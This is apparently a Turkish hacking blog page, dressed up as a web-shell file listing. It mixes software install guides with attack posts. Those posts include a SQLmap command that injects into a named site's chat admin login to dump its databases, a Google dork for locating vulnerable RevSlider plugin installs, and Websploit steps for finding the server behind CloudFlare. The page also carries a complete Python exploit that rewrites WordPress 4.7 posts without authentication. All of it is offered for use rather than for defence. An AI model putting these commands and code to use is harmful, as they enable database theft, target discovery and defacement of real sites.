Erdinç
Kaya
today : | safemode : ON
> / home / facebook / twitter / exit /
name author perms com modified label

SQLmap Post Attack k4y4 rwxr-xr-x 0 Mart 16, 2017

Filename SQLmap Post Attack
Permission rw-r--r--
Author k4y4
Date and Time Mart 16, 2017
Label
Action
Genel de en bilindik sql injection id=1' olur fakat az bilinen çok uygulanan
bir atak daha vardır login kısımlarına uyguladığımız 1'or'1'='1 login bypass
teknikleri vardır aynı açıktan yola çıkarak veritabanına erişmek mümkündür
şöyle ki ;

Şöyle bir login şifre ve kullanıcı adına ' tırnak koyalım ve test edelim

Testimiz başarılı hata mesajı verdirebildik.


Şimdi Mozilla Firefox tarayıcımıza Live HTTP Headers eklentisini yükleyelim
post edilen datayı daha sağlıklı görüp almak için yükledikten sonra
Araçlar kısmından eklentiyi seçelim


şimdi Capture seçeneği seçili iken rastgele kullanıcı adı şifre girelim
seçili kısımdaki gibi data çıkacak;

"L=spanish&Link=&LIMIT=&pmc_username=k4y4&pmc_password=k4y4&login_form=Ingresar"
şimdi SQLmap uygulamasını çalıştıralım ve komutumuzu girelim siz komutu girin ben o sırada parametreleri anlatayım; 

sqlmap -u "http://www.sistemleg.com/phpmychat/admin.php" --data="L=spanish&Link=&LIMIT=&pmc_username=k4y4&pmc_password=k4y4&login_form=Ingresar" -p "pmc_username" --batch --random-agent --dbs

-u (açığın bulunduğu adres)
--data (açığın post ettiği data live http headers ile aldık)
-p (data için de açığın bulunduğu input name i)
--batch (hızlı bi sonuç için programın seçeneklerini seçer)
--random-agent (güvenlik duvarı aşmak için user agent kullanımı)
--dbs (database's veritabanlarının adını yazdırmak)
Veritabanına sızma işlemi başarı ile gerçekleşti

WordPress Plugin RevSlider 3.0.95 - Arbitrary File Upload / Execution (Metasploit) k4y4 rwxr-xr-x 0 Şubat 21, 2017

Filename WordPress Plugin RevSlider 3.0.95 - Arbitrary File Upload / Execution (Metasploit)
Permission rw-r--r--
Author k4y4
Date and Time Şubat 21, 2017
Label
Action


Google Dork;
index of /wp-content/plugins/revslider/temp/update_extract/revslider

Websploit CloudFlare Bypass k4y4 rwxr-xr-x 0 Şubat 19, 2017

Filename Websploit CloudFlare Bypass
Permission rw-r--r--
Author k4y4
Date and Time Şubat 19, 2017
Label
Action
websploit
show modules
web/cloudflare_resolver
use web/cloudflare_resolver
show options
set target siteadi.com
run

Libre Office Kurulumu k4y4 rwxr-xr-x 0 Şubat 19, 2017

Filename Libre Office Kurulumu
Permission rw-r--r--
Author k4y4
Date and Time Şubat 19, 2017
Label
Action
İndirme (Download) linki; http://donate.libreoffice.org/home/dl/deb-x86_64/5.2.5/tr/LibreOffice_5.2.5_Linux_x86-64_deb.tar.gz

tar -xzvf LibreOffice....
yapıp klasör olarak masaüstümüze getiriyoruz ardından
cd LibreOffice_5.2.5.1_Linux_x86-64_deb
ls yapıp içeriğini görebiliriz..
cd DEBS
root izni istiyorsa;
sudo dpkg -i *.deb
yaparak kurulumun bitmesini bekliyoruz.

Sırasıyla görseller;




Linux Websploit Kurulumu k4y4 rwxr-xr-x 0 Şubat 19, 2017

Filename Linux Websploit Kurulumu
Permission rw-r--r--
Author k4y4
Date and Time Şubat 19, 2017
Label
Action
Kali linux vs. sistemlerde websploit kendiliğinden kurulu gelsede "Backbox, ubuntu" vs. gibi sistemlerde kurulu gelmemekte. Pekii biz bu kurulumu nasıl gerçekleştireceğiz ?
Öncelikle websploit indirmek için;
https://sourceforge.net/projects/websploit/

İndirip masaüstümüze attıktan sonra; 

Sistemimizde root değil isek sudo su ile kendimizi root yapıp
websploit dizinine gittikten sonra sh install.sh yapıp arkamıza yaslanarak saniyeler içindeki kuruluşunu izliyoruz :) Ardından cd ile ana dizine giderek websploit yazarak çalıştırıyoruz.

Linux for Skype Alpha k4y4 rwxr-xr-x 0 Şubat 19, 2017

Filename Linux for Skype Alpha
Permission rw-r--r--
Author k4y4
Date and Time Şubat 19, 2017
Label
Action
Kali linux (64bit) vb. sistemlere Skype kurmanın zorluğunu vs. maalesef ki biliyoruz :) Skype Alpha bunu bizim için kolaylaştırıyor.
Öncelikle Skype Alpha indirme linki;
https://community.skype.com/t5/Linux/Skype-for-Linux-Alpha-and-calling-on-Chrome-amp-Chromebooks/td-p/4434299

İndirdikten sonra masaüstümüze atıp girmemiz gereken komut sırasıyla;

cd Masaüstü
dpkg -i skype..(dosyadi)

Ardından kurulumda hata bile verse aslında skype çalışır durumdadır.


WordPress 4.7 – Unauthenticated Content Injection k4y4 rwxr-xr-x 2 Şubat 15, 2017

Filename WordPress 4.7 – Unauthenticated Content Injection
Permission rw-r--r--
Author k4y4
Date and Time Şubat 15, 2017
Label
Action
 
Python (pwn.py);
import json
import sys
import urllib2
from lxml import etree
def get_api_url(wordpress_url):
    response = urllib2.urlopen(wordpress_url)
    data = etree.HTML(response.read())
    u = data.xpath('//link[@rel="https://api.w.org/"]/@href')[0]
    # check if we have permalinks
    if 'rest_route' in u:
        print(' ! Warning, looks like permalinks are not enabled. This might not work!')
    return u
def get_posts(api_base):
    respone = urllib2.urlopen(api_base + 'wp/v2/posts')
    posts = json.loads(respone.read())
    for post in posts:
        print(' - Post ID: {}, Title: {}, Url: {}'
              .format(post['id'], post['title']['rendered'], post['link']))
def update_post(api_base, post_id, post_content):
    # more than just the content field can be updated. see the api docs here:
    # https://developer.wordpress.org/rest-api/reference/posts/#update-a-post
    data = json.dumps({
        'content': post_content
    })
    url = api_base + 'wp/v2/posts/{post_id}/?id={post_id}abc'.format(post_id=post_id)
    req = urllib2.Request(url, data, {'Content-Type': 'application/json'})
    response = urllib2.urlopen(req).read()
    print('* Post updated. Check it out at {}'.format(json.loads(response)['link']))
def print_usage():
    print('Usage: {} (optional: )'.format(__file__))
if __name__ == '__main__':
    # ensure we have at least a url
    if len(sys.argv) < 2:
        print_usage()
        sys.exit(1)
    # if we have a post id, we need content too
    if 2 < len(sys.argv) < 4:
        print('Please provide a file with post content with a post id')
        print_usage()
        sys.exit(1)
    print('* Discovering API Endpoint')
    api_url = get_api_url(sys.argv[1])
    print('* API lives at: {}'.format(api_url))
    # if we only have a url, show the posts we have have
    if len(sys.argv) < 3:
        print('* Getting available posts')
        get_posts(api_url)
        sys.exit(0)
    # if we get here, we have what we need to update a post!
    print('* Updating post {}'.format(sys.argv[2]))
    with open(sys.argv[3], 'r') as content:
        new_content = content.readlines()
    update_post(api_url, sys.argv[2], ''.join(new_content))
    print('* Update complete!')
 

Erdinckaya © 2017 Erdinç Kaya | Siber Güvenlik Blog
Template design by k4y4